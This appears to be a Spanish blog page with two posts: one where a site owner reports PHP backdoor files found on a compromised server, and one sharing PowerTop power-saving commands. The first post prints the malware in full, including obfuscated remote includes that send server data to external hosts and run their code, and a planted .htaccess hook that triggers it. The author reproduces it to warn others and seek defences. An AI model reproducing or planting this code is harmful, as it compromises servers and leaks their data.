Malditos Scriptkiddies o seudo hackers!.

He encontrado en unas carpetas de imagenes, unos archivos con extensión PHP y con nombres de numeros aleatorios (eso creo), en donde esta el siguiente codigo:

<br /> < ?<br /> error_reporting(0);<br /> $s="e";<br /> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);<br /> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);<br /> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);<br /> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);<br /> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);<br /> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);<br /> $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);<br /> $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);<br /> $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);<br /> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);</p>
<p>$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".<br /> base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".<br /> base64_encode($i).".".base64_encode($j);</p>
<p>if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){<br /> } else {<br /> include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);<br /> }<br /> ?><br /> 

y bueno, a simple vista no significa nada a excepto de unos includes medio sospechosos!., con una cadena codificada, si descodificamos la cadena son unas URL, en donde se efectua el ataque y robo del servidor, supongo que para enviar SPAM! y mas SPAM!…., esta es la traduccion de base64 a algo entendible

base64_decode(“aHR0cDovLw==”) ‘http://’
base64_decode(“d3d3My5yc3NuZXdzLndz”) ‘www3.rssnews.ws’
base64_decode(“d3d3My54bWxkYXRhLmluZm8=”) ‘www3.xmldata.info’

Ahora bien, la pregunta para solucionar eso es, alguien sabe alguna forma de desabilitar que en un include o requiere de PHP se pueda leer rutas externas mediante HTTP, HTTPS ????, y que solo pueda leer contenidos de la maquina local??.., creo que activando esa directiva podremos evitar muchos de estos ataques.

Tambien para variar he encontrado un archivo .htaccess dentro del mismo directorio de los archivos sospechosos de PHP que contiene lo siguiente:

Options -MultiViews
ErrorDocument 404 //data/phoo/45757.php

Muy ingenioso su script no??, asi por cada error 404 manda llamar su mentado script y quien sabe que tantas cochinadas haran!..,

Tambien sera algun bug del gadget Phoo del Jaws???, o sera que como es un servidor compartido, algun otro usuario esta enviando este tipo de cosas??… tendre que revisar los logs a ver si veo algo extraño., pero de mientras si tienen un server, verifiquen sus archivos!, no vaya a ser que esten infectados

Powertop, comandos utiles para ahorro de energia

Después de instalar la aplicación PowerTop en Ubuntu Gutsy, me han aparecido algunos comandos que quiero compartir con ustedes para el ahorro de energía, quiero suponer que no es necesario tener instalado PowerTop y tampoco tener el Kernel Linux 2.6.22 aunque es ampliamente recomendado debido a que utiliza un núcleo tickless que mejora la administración de energía, pero bueno!, aquí están los comandos.

Suggestion: enable AC97 powersave mode by executing the following command:

echo 1 > /sys/module/snd_ac97_codec/parameters/power_save

or by passing power_save=1 as module parameter.

Suggestion: increase the VM dirty writeback time from 5.00 to 15 seconds with:

echo 1500 > /proc/sys/vm/dirty_writeback_centisecs

This wakes the disk up less frequenty for background VM activit

Suggestion: Disable ‘hal’ from polling your cdrom with:

hal-disable-polling /dev/scd0 ‘hal’ is the component that auto-opens a

window if you plug in a CD but disables SATA power saving from kicking in.

Como pueden ver, son comandos muy sencillos que si bien los podemos poner en un script de inicio o desde los archivos de configuración de Linux.

Aquí les dejo también los tiempos del wakeups (si alguien sabe que significa se lo agradecería, porque nomas tengo una noción de que puede ser!, pero no la certeza)

PowerTOP version 1.7 (C) 2007 Intel Corporation

< La información detallada sobre estados-C está sólo disponible en CPUs Móbiles (portátiles/latops) >

2.00 Ghz ( 0.0%)
1.80 Ghz ( 0.0%)
1000 Mhz (100.0%)

Wakeups-from-idle per second : 678.3 interval: 10.0s
Power usage (5 minute ACPI estimate) : 42.8 W (1.4 hours left)

Top causes for wakeups:
21.5% (106.4) : ATI IXP, ATI IXP Modem, fglrx
20.9% (103.4) firefox-bin : schedule_timeout (process_timeout)
14.0% ( 69.5) komodo-bin : schedule_timeout (process_timeout)
8.3% ( 41.0) wish : futex_wait (hrtimer_wakeup)
5.9% ( 29.3)
: acpi, tifm_7xx1, bcm43xx
5.7% ( 28.2) Xgl : do_setitimer (it_real_fn)